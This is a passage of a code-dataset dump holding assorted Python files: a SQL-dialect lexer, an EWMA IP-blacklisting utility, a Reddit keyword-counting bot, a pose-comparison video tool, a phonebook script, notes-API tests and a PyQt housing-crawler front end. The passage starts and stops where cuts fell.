r'\\|\\|'\nt_BAND = r'\\&'\nt_BOR = r'\\|'\nt_NUMERAL = r'\\#'\nt_VIRGULILLA = r'\\~'\nt_MOVD = r'\\>\\>'\nt_MOVI = r'\\<\\<'\n\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_CADENA(t):\n r'(\\\".*?\\\"|\\'.*?\\')'\n t.value = t.value[1:-1]\n return t\n\n\ndef t_DISTINTO(t):\n r'(!=|<>)'\n t.type = reserved.get(t.value.lower(), 'DISTINTO')\n return t\n\n\ndef t_DECIMAL(t):\n r'\\d+\\.\\d+'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Valor decimal muy largo %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_INT(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n except ValueError:\n print(\"Valor entero muy largo %d\", t.value)\n t.value = 0\n return t\n\n\n# Comentarios:\n# multilinea /* .. */\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\n# simple --\n\n\ndef t_COMENTARIO_SIMPLE(t):\n r'--(.)+(\\n)+'\n #t.lexer.lineno += 1\n\n\n# Caracteres ignorados\nt_ignore = \" \\t\"\n\n\ndef t_NEWLINE(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n \n\ndef t_error(t):\n print(\"Caracter inválido %s\" % t.value[0])\n error = (\"Léxico\", \"Caracter inválido %s\" % t.value[0], t.lexer.lineno)\n ErrorTable.add(error)\n t.lexer.skip(1)\n\n\n\nlexico = lex.lex()\n","sub_path":"parser/team04/Interpreter/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91705815","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# file with utility variables & functions\n\nimport datetime as dt\n\n# ewma degree of weight decrease (value closer to 1 give more weight to most recent trends)\nalpha = 0.9\n\n# threshold for blacklisting an ip\newma_threshold = 0.5\n\n# day offset\noffset = 17\n\n# training window length\nwindow_len = 5\n\n# compute blacklists based on local contributor logs\ndef local_prediction(top_targets, train_set, window):\n \n binary_mat = dict()\n prediction = dict()\n blacklist = dict()\n whitelist = dict()\n binary_mat = binary_matrix(top_targets, train_set, window)\n prediction = local_score_prediction(binary_mat)\n blacklist, whitelist = local_blacklist(prediction)\n \n return blacklist, whitelist\n\n# compute the binary matrix required for EWMA\ndef binary_matrix(targets, train_set, window):\n\n # the binary matrix with keys of the form 'victim' contains a second dictionary with keys \n # 'src_ip' and values the binary list for all days e.g. [1, 0, 0, 0, 0]\n binary_matrix = dict()\n \n for victim in targets:\n binary_matrix[victim] = dict() \n \n c = train_set.groupby(['target_ip', 'src_ip'])\n \n # iterate through the groups\n for group, row in c:\n \n binary_matrix[group[0]][group[1]] = [0 for r in xrange(window_len)]\n \n # get the days of attacks\n d = row['D']\n for day in d:\n binary_matrix[group[0]][group[1]][day.day - window - offset] = 1 \n del d\n \n del c\n \n return binary_matrix\n\n# compute the ewma prediction for each contributor\ndef local_score_prediction(binary_matrix):\n \n predictions = dict()\n\n for target in binary_matrix:\n \n predictions[target] = dict()\n \n for attacker in binary_matrix[target]:\n \n predictions[target][attacker] = ts_score(window_len, binary_matrix[target][attacker]) \n \n return predictions\n\n# generate the blacklist based on the ewma predictions \ndef local_blacklist(predictions):\n \n local_blacklists = dict()\n local_whitelists = dict()\n \n # for every contributor\n for victim in predictions:\n \n # get those attackers that have scored above the threshold\n l = [(k, v) for k, v in predictions[victim].iteritems() if v >= ewma_threshold]\n local_blacklists[victim] = set([w[0] for w in l])\n m = [(k, v) for k, v in predictions[victim].iteritems() if v < ewma_threshold]\n local_whitelists[victim] = set([z[0] for z in m])\n \n return local_blacklists, local_whitelists \n\n# ewma weight generation\ndef compute_weights(a, N):\n ws = list()\n for i in range(N - 1, -1, -1):\n w = a * ((1-a)**i)\n ws.append(w)\n \n return ws\n\n# sum weighted data\ndef sum_weighted(data, ws):\n wt = list()\n for i, x in enumerate(data):\n wt.append(x*ws[i])\n \n return sum(wt)\n\n# assign a ewma score\ndef ts_score(N, data):\n ws = compute_weights(alpha, N)\n pred = sum_weighted(data, ws)\n \n return pred ","sub_path":"utils/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308744976","text":"app = None\n\n\ndef start_app():\n from backend.initial_setup import CalculatedServer\n global app\n server = CalculatedServer()\n app = server.app\n return server\n\n\ndef start_server():\n server = start_app()\n server.app.run(host='0.0.0.0', port=8000)\n\n\nif __name__ == '__main__':\n start_server()\nelse:\n start_app()\n","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"645436041","text":"class Solution:\n def reverse(self, x: int) -> int:\n reversed_num = \"\"\n start = 0\n end = len(str(x))\n while str(x).endswith(\"0\") and x != 0:\n x //= 10\n\n if x < 0:\n sign = \"-\"\n x = abs(x)\n else:\n sign = \"\"\n\n for i in reversed(str(x)[start:end]):\n reversed_num += i\n x = int(sign + reversed_num)\n\n neg_limit= -0x80000000\n pos_limit= 0x7fffffff\n if not(neg_limit < x < pos_limit):\n x = 0\n return x\n\n","sub_path":"easy/reverseInteger.py","file_name":"reverseInteger.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227461867","text":"liste={}\n\nkayit=\"\"\nwhile True:\n #---------------SECME INPUTU-----------------------------\n print(\"\\n________________REHBERIM MENU_____________________\\n\")\n secim=input(\"\"\"\nYeni Kayit : K\nKisiler : R CIKIS=Q\n---------> :\"\"\").upper()\n\n if secim=='Q':\n print('Cikiliyor.....')\n break\n elif secim=='K':\n\n yeni_kisi = input(' Adi ve Soyadi :' ).upper()\n\n while True:\n\n telefon=input(' Telefon No :')\n\n if len(telefon)!=10 :\n print('lutfen 10 haneli telefonunuzu giriniz')\n continue\n else:\n tel = f'+31 {telefon[0 :3]} {telefon[3 :6]} {telefon[6 :8]} {telefon[8 :10]}'\n break\n\n #------------SOZLUGE EKLEME-----------------------\n\n liste[yeni_kisi]=tel\n print('\\nBasariyla kaydedildi...\\n')\n\n #------------DOSYAYA YAZMA----------------------------------\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku,yaz in liste.items():\n\n kayit=f'{oku} : {yaz} ''\\n'\n\n rehber.write(kayit)\n\n #----------------REHBERE GIRIS INPUTU----------------------------\n elif secim== 'R' :\n\n while True:\n if liste == {} :\n print ( 'Rehberinizde kayit yok.' )\n break\n else :\n #---------REHBERI GOSTERME-------------------\n for anahtar, deger in liste.items () :\n\n print ( \">>>{} : {}\".format ( anahtar , deger ) )\n\n #----------REHBER ICINDEKI SECIMLER------------------------\n\n duzen = input ( \"\"\"\n>>>>>>>>>>>>>>>>>>>>>\n\n Kayit Sil : S\n Kayit Yenile : Y\n Tumunu sil : T\n Ana menu : X\n >>>>>>>>>>>>>>>>>>>> :\"\"\" ).upper()\n #------------ANA MENUYE DONUS----------------------\n if duzen=='X':\n print('Ana Menuye donuluyor... ')\n break\n\n #---------REHBERDEN ISIM SILME----------------------\n elif duzen=='S':\n for anahtar ,deger in liste.items () :\n print ( \"{} : {}\".format ( anahtar , deger ) )\n\n while True:\n\n sil=input('\\n''silmek istediginiz ismi giriniz(cikis ENTER) :').upper()\n if sil=='':\n\n break\n elif sil in liste:\n liste.pop(sil) #POP() KOMUTU ILE SILINDI\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku , yaz in liste.items () :\n kayit = f'{oku} : {yaz} ''\\n'\n\n rehber.write ( kayit )\n print ( 'Kayit silindi simdi Ana menuye yonlendiriliyorsunuz....' '\\n')\n\n break\n else:\n print('kayit bulunamadi')\n continue\n\n #----------REHBERDE ISIM NO GUNCELLEME-----------------\n\n elif duzen=='Y' :\n for anahtar,deger in liste.items () :\n print ( \"{} : {}\".format ( anahtar , deger ) )\n\n\n while True :\n guncelle = input ( '\\n''lutfen guncellemek istediginiz ismi giriniz(cikis ENTER)' ).upper()\n if guncelle=='':\n break\n\n elif guncelle not in liste:\n print('kayit bulunamadi' )\n continue\n else:\n liste.pop ( guncelle )\n break\n yeni_giris = input ('\\n''Yeni ismi Giriniz:' ).upper()\n while True:\n\n yeni_giris2 = input ( 'Yeni Tel No:' )\n\n if len ( yeni_giris2 ) != 10 :\n print ( 'lutfen 10 haneli telefonunuzu giriniz' )\n continue\n else :\n tel = f'+31 {yeni_giris2[0 :3]} {yeni_giris2[3 :6]} {yeni_giris2[6 :8]} {yeni_giris2[8 :10]}'\n\n break\n #-------------UPDATE KOMUTU ILE GUNCENLENDI-----------\n up_dte={yeni_giris:yeni_giris2}\n liste.update(up_dte)\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku , yaz in liste.items () :\n kayit = f'{oku} : {yaz} ''\\n'\n print ( kayit )\n rehber.write ( kayit )\n\n print('isleminiz basariyla gerceklestirildi.')\n\n # ----------REHBERIN HEPSINI SILME-----------------\n elif duzen=='T' :\n liste.clear() #CLEAR() KOMUTU ILE TEMIZLENDI\n print('tum liste temizlendi')\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n rehber.write('')\n\n else:\n print('Lutfen dogru tusa bastiginizdan emin olun')\n continue\n\n break\n else:\n print('Yanlis bir tusa bastiniz')\n","sub_path":"rehber.py","file_name":"rehber.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"463810967","text":"import cv2\nimport numpy as np\nimport os\nimport moviepy.editor as mpe\nimport ffmpy\nfrom modules.inference_engine_pytorch import InferenceEnginePyTorch\nfrom modules.parse_poses import parse_poses\nfrom modules.draw import draw_poses\n\n\ndef load_model(model='human-pose-estimation-3d.pth', device='CPU'):\n return InferenceEnginePyTorch(model, device)\n\n\ndef find_central(poses, prev_pose=None):\n pose = poses[:, 0:57]\n pose = pose.reshape((len(pose), -1, 3))\n posex = pose[:, :, 0]\n posey = pose[:, :, 1]\n avgsx = np.average(posex, axis=1)\n avgsy = np.average(posey, axis=1)\n avgx = np.average(avgsx)\n avgy = np.average(avgsy)\n errs = (avgsx - np.repeat(avgx, len(pose), axis=0)) ** 2 + (avgsy - np.repeat(avgy, len(pose), axis=0)) ** 2\n if prev_pose is not None:\n errs += 80 * np.average((poses - np.repeat(prev_pose, len(poses), axis=0) ** 2), axis=1)\n res, min_err = -1, np.inf\n for i in range(len(errs)):\n if errs[i] < min_err:\n res, min_err = i, errs[i]\n return np.expand_dims(poses[res], axis=0)\n\n\ndef find_humans(frame, net, prev_pose=None):\n stride = 8\n base_height = 256\n input_scale = base_height / frame.shape[0]\n scaled_img = cv2.resize(frame, dsize=None, fx=input_scale, fy=input_scale)\n scaled_img = scaled_img[:, 0:scaled_img.shape[1] - (scaled_img.shape[1] % stride)]\n\n inference_result = net.infer(scaled_img)\n fx = np.float32(0.8 * frame.shape[1])\n poses_3d, poses_2d = parse_poses(inference_result, input_scale, stride, fx, True)\n return find_central(poses_2d.copy(), prev_pose)\n\n\ndef draw_humans(frame, poses_2d):\n draw_poses(frame, poses_2d)\n\n\ndef open_video(path):\n cap = cv2.VideoCapture(path)\n if not cap.isOpened():\n raise Exception('Error opening video {}'.format(path))\n return cap\n\n\ndef concat_images(img1, img2, height=500):\n def compress_img(img):\n w = round(img.shape[1] * height / img.shape[0])\n return cv2.resize(img, (w, height), interpolation=cv2.INTER_AREA)\n\n c1 = compress_img(img1)\n c2 = compress_img(img2)\n return np.concatenate((c1, c2), axis=1)\n\n\ndef normalize_pose(p):\n p = p.astype('float64')\n p -= np.repeat(np.expand_dims(p.mean(axis=0), axis=0), p.shape[0], axis=0)\n k = np.median(p[:, 0] ** 2 + p[:, 1] ** 2)\n if k != 0:\n p /= k\n return p\n\n\ndef pose_to_points_array(pose):\n pose = pose.copy()\n return pose[0, :-1].reshape((-1, 3))[:, 0:2]\n\n\ndef count_pos_error(pos1, pos2):\n p1 = normalize_pose(pose_to_points_array(pos1))\n p2 = normalize_pose(pose_to_points_array(pos2))\n return round(((p1 - p2) ** 2).sum(axis=1).mean().item() * 1000000)\n\n\ndef add_error_on_frame(frame, err):\n font = cv2.FONT_HERSHEY_PLAIN\n font_scale = 1.0\n thickness = 2\n h, w = frame.shape[: 2]\n\n def get_text_start_point(center_point, text):\n center_point_x, center_point_y = center_point\n text_sz, _ = cv2.getTextSize(text, font, font_scale, thickness)\n text_sz_x, text_sz_y = text_sz\n return (center_point_x - text_sz_x // 2,\n center_point_y + text_sz_y // 2)\n\n label = str(err)\n x, y = w // 2, h - 30\n cv2.rectangle(frame, (x - 50, y - 20), (x + 50, y + 20), color=[255, 255, 255], thickness=-1)\n cv2.putText(frame, label, get_text_start_point((x, y), label),\n font, thickness=thickness, color=[0, 0, 0], fontScale=font_scale)\n\n return frame\n\n\ndef print_grade(total_err):\n print()\n print('Total err: {}'.format(total_err))\n\n grades = [(75, 5), (150, 4), (225, 3), (300, 2), (np.inf, 1)]\n\n for bound, grade in grades:\n if total_err <= bound:\n print('Grade: {}'.format(grade))\n return total_err, grade\n\n\ndef modify_two_videos(cap1, cap2, frame_modifier, out=None, logger=None):\n fps = round(cap1.get(cv2.CAP_PROP_FPS))\n cap1.set(cv2.CAP_PROP_FPS, fps)\n cap2.set(cv2.CAP_PROP_FPS, fps)\n frames = round(min(\n cap1.get(cv2.CAP_PROP_FRAME_COUNT),\n cap2.get(cv2.CAP_PROP_FRAME_COUNT)))\n\n i = 0\n while cap1.isOpened() and cap2.isOpened():\n print('\\rFrame {}/{}'.format(i, frames), end='')\n if logger is not None:\n logger.log(i, frames)\n i += 1\n ret1, frame1 = cap1.read()\n ret2, frame2 = cap2.read()\n if not ret1 or not ret2:\n break\n frame = frame_modifier(frame1, frame2)\n\n if out is not None:\n out.write(frame)\n\n cap1.release()\n cap2.release()\n if out is not None:\n out.release()\n\n\ndef smooth_poses(prv, cur, nxt):\n e1 = count_pos_error(prv, cur)\n e2 = count_pos_error(cur, nxt)\n e3 = count_pos_error(prv, nxt)\n res = cur\n if e1 + e2 > 1.5 * e3:\n res = (prv + nxt) // 2\n return res\n\n\nclass Logger:\n def __init__(self, callback, l_threshold, r_threshold):\n self.callback = callback\n self.l_threshold = l_threshold\n self.r_threshold = r_threshold\n\n def log(self, x, y):\n \"\"\"x out of y done\"\"\"\n if self.callback is not None:\n self.callback((self.l_threshold * (y - x) + self.r_threshold * x) / y)\n\n\ndef draw_arrows(frame, train_pose, my_pose):\n train_normalized = normalize_pose(train_pose.copy())\n my_normalized = normalize_pose(my_pose.copy())\n train_pose = pose_to_points_array(train_pose)\n my_pose = pose_to_points_array(my_pose)\n train_center = train_pose.mean(axis=0)\n my_center = my_pose.mean(axis=0)\n for i in range(my_normalized.shape[0]):\n d = my_normalized[i] - train_normalized[i]\n dist = (d[0] ** 2).sum()\n if dist > 0.0005:\n x = tuple(np.rint(my_pose[i]).astype(int))\n y = tuple(np.rint(train_pose[i] - train_center + my_center).astype(int))\n frame = cv2.arrowedLine(frame, x, y,\n color=[0, 255, 0], thickness=3)\n return frame\n\n\ndef make_video(path1, path2, out_path, res_estimator, processing_log=None):\n prv1, cur1 = None, None\n prv2, cur2 = None, None\n prv_frame1, prv_frame2 = None, None\n\n cap1 = open_video(path1)\n cap2 = open_video(path2)\n fps = round(cap1.get(cv2.CAP_PROP_FPS))\n\n errors = []\n h1, w1 = round(cap1.get(cv2.CAP_PROP_FRAME_HEIGHT)), round(cap1.get(cv2.CAP_PROP_FRAME_WIDTH))\n h2, w2 = round(cap2.get(cv2.CAP_PROP_FRAME_HEIGHT)), round(cap2.get(cv2.CAP_PROP_FRAME_WIDTH))\n h, w = concat_images(np.zeros((h1, w1, 3)), np.zeros((h2, w2, 3))).shape[: 2]\n\n def frame_modifier(frame1, frame2):\n nonlocal prv1, prv2, cur1, cur2, prv_frame1, prv_frame2, h, w\n nxt1 = find_humans(frame1, res_estimator, cur1)\n nxt2 = find_humans(frame2, res_estimator, cur2)\n if prv1 is None:\n prv1, prv2 = nxt1, nxt2\n elif cur1 is None:\n cur1, cur2 = nxt1, nxt2\n else:\n cur1 = smooth_poses(prv1, cur1, nxt1)\n cur2 = smooth_poses(prv2, cur2, nxt2)\n if prv_frame1 is not None:\n draw_humans(prv_frame1, cur1)\n draw_humans(prv_frame2, cur2)\n frame2 = draw_arrows(frame2, cur1.copy(), cur2.copy())\n frame = concat_images(prv_frame1, prv_frame2)\n else:\n frame = concat_images(frame1, frame2)\n\n prv_frame1, prv_frame2 = frame1, frame2\n prv1, prv2, cur1, cur2 = cur1, cur2, nxt1, nxt2\n\n err = 0\n if cur1 is not None:\n err = count_pos_error(cur1, cur2)\n errors.append(err)\n\n return add_error_on_frame(frame, err)\n\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n c = out_path.split('.')\n tmp_path = '.'.join(c[:-1]) + '_tmp.' + c[-1]\n out_cap = cv2.VideoWriter(tmp_path, fourcc, fps, (w, h))\n\n modify_two_videos(cap1, cap2, frame_modifier, out_cap, Logger(processing_log, 0, 100))\n\n # set audio\n output_video = mpe.VideoFileClip(tmp_path)\n audio_background = mpe.VideoFileClip(path1).audio.subclip(t_end=output_video.duration)\n final_video = output_video.set_audio(audio_background)\n final_video.write_videofile(out_path)\n os.remove(tmp_path)\n\n if len(errors) != 0:\n total = round(np.mean(errors).item())\n return print_grade(total)\n\n\ndef convert_video(video_path, out_path):\n flags = '-r 24 -codec copy'\n ff = ffmpy.FFmpeg(inputs={video_path: None}, outputs={out_path: flags})\n ff.run()\n\n\nif __name__ == '__main__':\n path1 = '../../kek1.mp4'\n path2 = '../../kek2.mp4'\n out_path = '../../kek5.mp4'\n\n e = load_model()\n\n make_video(path1, path2, out_path, e)","sub_path":"process_videos.py","file_name":"process_videos.py","file_ext":"py","file_size_in_byte":8520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461347022","text":"import praw\nimport time\nimport logging\nfrom pymongo import MongoClient\n\n# Base class for all bots\nclass Bot:\n\n DEBUG = False\n\n # praw constants\n GET_LIMIT = 50\n LOOP_WAIT_TIME = 10\n\n # word parsing constants\n WHOLE_WORD_TOLERANCE = 3\n\n def __init__(self, bot_name, bot_agent, subreddit_name, map_or_list):\n \"\"\"\n Constructs a reddit bot that crawls the comments to tally for keywords.\n\n :param bot_name:\n :param bot_agent:\n :param subreddit_name:\n :param map_or_list: A list of keywords to watch for or a dict with key as the\n keywords with value as some meta data.\n :return:\n \"\"\"\n\n data_type = type(map_or_list)\n assert data_type is dict or data_type is list\n\n # logging setup\n logging.basicConfig(filename=subreddit_name + '.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s:%(message)s')\n logging.info(\"Bot initializing\")\n\n # Bot info\n self.bot_name = bot_name\n self.bot_agent = bot_agent\n self.subreddit_name = subreddit_name\n self.start_time = int(time.time())\n self.last_insert_time = self.start_time\n\n # Reddit objects\n self.reddit = praw.Reddit(user_agent=self.bot_agent)\n self.reddit.config.store_json_result = True\n self.subreddit = self.reddit.get_subreddit(self.subreddit_name)\n\n # Database objects (remember to close database)\n self.mongo_client = MongoClient()\n self.db = self.mongo_client[bot_name]\n self.comments = self.db.comments\n self.meta = self.db.meta\n self.tags = self.db.tags\n\n # Can either supply tags as a list of strings\n # or a dict with key being the tag name and properties\n # being the meta information\n if data_type is dict:\n tag_names = list(map_or_list.keys())\n else:\n tag_names = map_or_list\n\n for name in tag_names:\n assert name.islower()\n\n # update the meta data of database\n if not self.meta.find_one():\n inserted = self.meta.insert_one({\n '_id': 'meta',\n 'bot_name': self.bot_name,\n 'bot_agent': self.bot_agent,\n 'subreddit_name': self.subreddit_name,\n 'tag_names': tag_names\n })\n\n if self.DEBUG:\n print('inserted meta', inserted)\n\n # insert new tags or update old ones\n for tag_name in tag_names:\n if data_type is dict:\n meta = map_or_list[tag_name]\n else:\n meta = {}\n\n doc = self.tags.find_one({'name': tag_name})\n\n if doc:\n doc['meta'] = meta\n if self.DEBUG:\n print('updated tag meta', tag_name, meta)\n else:\n inserted = self.tags.insert_one({\n 'name': tag_name,\n 'words': tag_name.split(),\n 'meta': meta,\n 'count': 0,\n 'popularity': 0\n })\n if self.DEBUG:\n print('inserted tag', inserted)\n\n logging.info(\"Successfully initialized bot\")\n\n def process_comment(self, comment):\n \"\"\"\n Process comment body and add it to database.\n\n Ignored if comment already in database.\n\n :param comment:\n :return:\n \"\"\"\n\n if self.DEBUG:\n print('received comment', comment)\n\n doc = self.comments.find_one({'_id': comment.id})\n\n # if no entry with given comment id in the processed table\n if not doc:\n hits = self.process_string(comment.body)\n j = comment.json_dict\n j['_id'] = j['id']\n j['hits'] = hits\n self.comments.insert_one(j)\n\n def process_string(self, s):\n \"\"\"\n Check for any term mentioned in a string and increment the counter in the database.\n\n Case insensitive search. Only increment a term once per comment so no \"chuga chuga chuga....\" spams\n\n :param s:\n :return: a list of all the id that had a hit in this string\n \"\"\"\n\n comment_words = s.lower().split()\n hits = []\n for tag in self.tags.find():\n tag_words = tag['words']\n\n match = self.search_words_in_list(tag_words, comment_words)\n if match:\n self.tags.update_one({'_id': tag['_id']}, {'$inc': {'count': 1}})\n\n # if self.DEBUG:\n print('matched', tag['name'], 'count', tag['count'])\n\n hits.append(tag['_id'])\n return hits\n\n @classmethod\n def search_words_in_list(cls, search_words, words_list):\n \"\"\"\n Inexact search to find search_words in words_list.\n\n :param search_words:\n :param words_list:\n :return: whether there is a match\n \"\"\"\n\n search_len = len(search_words)\n list_len = len(words_list)\n match = False\n # match whole words if length of the search_words is less than WHOLE_WORD_TOLERANCE\n if search_len < cls.WHOLE_WORD_TOLERANCE:\n for x in range(0, list_len - search_len + 1):\n if search_words == words_list[x:x + search_len]:\n match = True\n break # efficiency\n # only have to match search_len - 1 part of the search_words\n else:\n for x in range(0, list_len - search_len):\n sub_word = words_list[x:x + search_len]\n matches = 0\n for name_part in search_words:\n if name_part in sub_word:\n matches += 1\n if matches >= search_len - 1:\n match = True\n break\n return match\n\n def start(self):\n \"\"\"\n Start the bot.\n\n Directly monitor and process all new comments made to the subreddit.\n\n :return:\n \"\"\"\n\n logging.info(\"Bot starting\")\n\n while True:\n comments = self.subreddit.get_comments(limit=self.GET_LIMIT)\n for comment in comments:\n self.process_comment(comment)\n time.sleep(self.LOOP_WAIT_TIME)\n","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551412305","text":"#!/usr/bin/env python3\n\nfrom hicprediction.training import training\nfrom hicprediction.configurations import *\nimport json\n\n@alltrain_options\n@click.command()\ndef create(setdirectory,conversion, modeloutputdirectory):\n for path in tqdm(os.listdir(setdirectory),\\\n desc=\"Iterating all of the training sets in directory\"):\n training(modeloutputdirectory, conversion , setdirectory\\\n +\"/\" +path)\n\nif __name__ == '__main__':\n create()\n","sub_path":"hicprediction/scripts/trainAll.py","file_name":"trainAll.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52337195","text":"from unittest import TestCase\nimport json\nimport logging\n\nimport peewee\n\nimport app\nfrom app import components\n\nAPI_BASE = components.BASE_PATH\n\n\nclass TestNotes(TestCase):\n\n post_args = {\n \"content_type\": \"application/json\"\n }\n\n new_note = {\n \"title\": \"test_title\",\n \"content\": \"test_content\\r\\nárviz tűrő tükör fúró gép\\r\\n\",\n \"tags\": [\"these\", \"are\", \"the\", \"test\", \"tags\", \"we\", \"look\", \"for\", \"árviz\", \"tűrő\", \"tükör\", \"fúró\", \"gép\"]\n }\n\n edited_note = {\n \"title\": \"edited title\",\n \"content\": \"edited contents\",\n \"tags\": [\"these\", \"are\", \"the\", \"other\", \"tags\", \"we\", \"have\", \"edited\", \"so\", \"far\"]\n }\n\n def setUp(self):\n self._db = peewee.SqliteDatabase(\":memory:\")\n components.DB.initialize(self._db)\n components.DB.connect()\n components.DB.create_tables(app.MODELS, safe=True)\n self.app = app.APP.test_client()\n pass\n\n def tearDown(self):\n self._db.close()\n\n def test_create_note(self):\n # given\n # - fixture\n\n # when\n response = self.app.post(API_BASE + \"/notes/\", data=json.dumps(self.new_note), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(201, response.status_code)\n\n response_json = json.loads(response.data)\n\n self.assertTrue(\"id\" in response_json)\n self.assertTrue(\"title\" in response_json)\n self.assertTrue(\"content\" in response_json)\n self._validate_tags(self.new_note, response_json)\n\n response = self.app.get(API_BASE + \"/notes/\")\n self.assertEqual(200, response.status_code)\n response_json = json.loads(response.data)\n\n self.assertTrue(response_json)\n\n def test_read_note(self):\n # given\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n response_json = json.loads(response.data)\n\n self._validate_tags(self.new_note, response_json)\n # TODO validate content\n\n def test_delete_note(self):\n # given\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.delete(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n # then\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(404, response.status_code)\n\n def test_edit_note(self):\n # given\n # - fixture, and\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.put(\"{}/notes/{}/\".format(API_BASE, note_id), data=json.dumps(self.edited_note), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n response_json = json.loads(response.data)\n\n self._validate_tags(self.edited_note, response_json)\n\n # -- check ID due a previous fuckup\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n response_json = json.loads(response.data)\n\n self.assertEqual(note_id, response_json[\"id\"])\n\n def _insert_note(self, note):\n response = self.app.post(API_BASE + \"/notes/\", data=json.dumps(note), **TestNotes.post_args)\n\n self.assertIsNotNone(response)\n self.assertEqual(201, response.status_code)\n\n response_json = json.loads(response.data)\n note_id = response_json[\"id\"]\n self.assertIsNotNone(note_id)\n logging.debug(\"note_id={}\".format(note_id))\n return note_id\n\n def _validate_tags(self, expected, actual):\n self.assertEqual(len(expected[\"tags\"]), len(actual[\"tags\"]))\n for tag in expected[\"tags\"]:\n self.assertTrue(tag in actual[\"tags\"])\n","sub_path":"server/app/notes/tests/test_note_crud.py","file_name":"test_note_crud.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"602392797","text":"# -*- coding: utf-8 -*-\r\nimport ctypes # 需要用到的库\r\nimport sys\r\nfrom xiaoye_UI import Ui_MainWindow\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom craw import craw\r\n\r\n\r\nclass Ui_Main(QMainWindow, Ui_MainWindow):\r\n def __init__(self):\r\n super(Ui_Main, self).__init__(parent=None)\r\n self.setWindowIcon(QIcon('house.png'))\r\n self.setupUi(self)\r\n self.label.setPixmap(QPixmap('city.png'))\r\n self.pushButton.clicked.connect(self.onclick_button)\r\n self.pushButton_2.clicked.connect(self.onclick_button2)\r\n\r\n def onclick_button(self):\r\n name = self.lineEdit.text()\r\n if name == '合肥':\r\n craw(name='hf')\r\n else:\r\n craw()\r\n msg_box = QMessageBox(QMessageBox.Information, '提示', '房源爬取完成!')\r\n msg_box.exec_()\r\n\r\n def onclick_button2(self):\r\n name = self.lineEdit.text()\r\n if name == '合肥':\r\n QtGui.QDesktopServices.openUrl(QtCore.QUrl('http://localhost:63342/python_finalwork/index_hf.html?_ijt=jc6pvcdr3nudd977qfq3h1bmbt'))\r\n else:\r\n QtGui.QDesktopServices.openUrl(QtCore.QUrl('http://localhost:63342/python_finalwork/index.html?_ijt=scor7v2s64cdl1bprj7k7nf65u'))\r\n\r\n\r\nif __name__ == '__main__':\r\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(\"myappid\")\r\n app = QApplication(sys.argv)\r\n window = Ui_Main()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"XiaoYe.py","file_name":"XiaoYe.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603587104","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport time\nfrom .login_page import LoginPage\n\n# import re\n\n# class QuestionTypeSideBar:\n# # 顶部的收起来按钮,绝对路径,单个\n# _locator_collapse_btn = (By.XPATH,'//*[@id=\"querytype\"]/h3/em')\n# # 列表,绝对路径,列表\n# _locator_list = (By.XPATH, 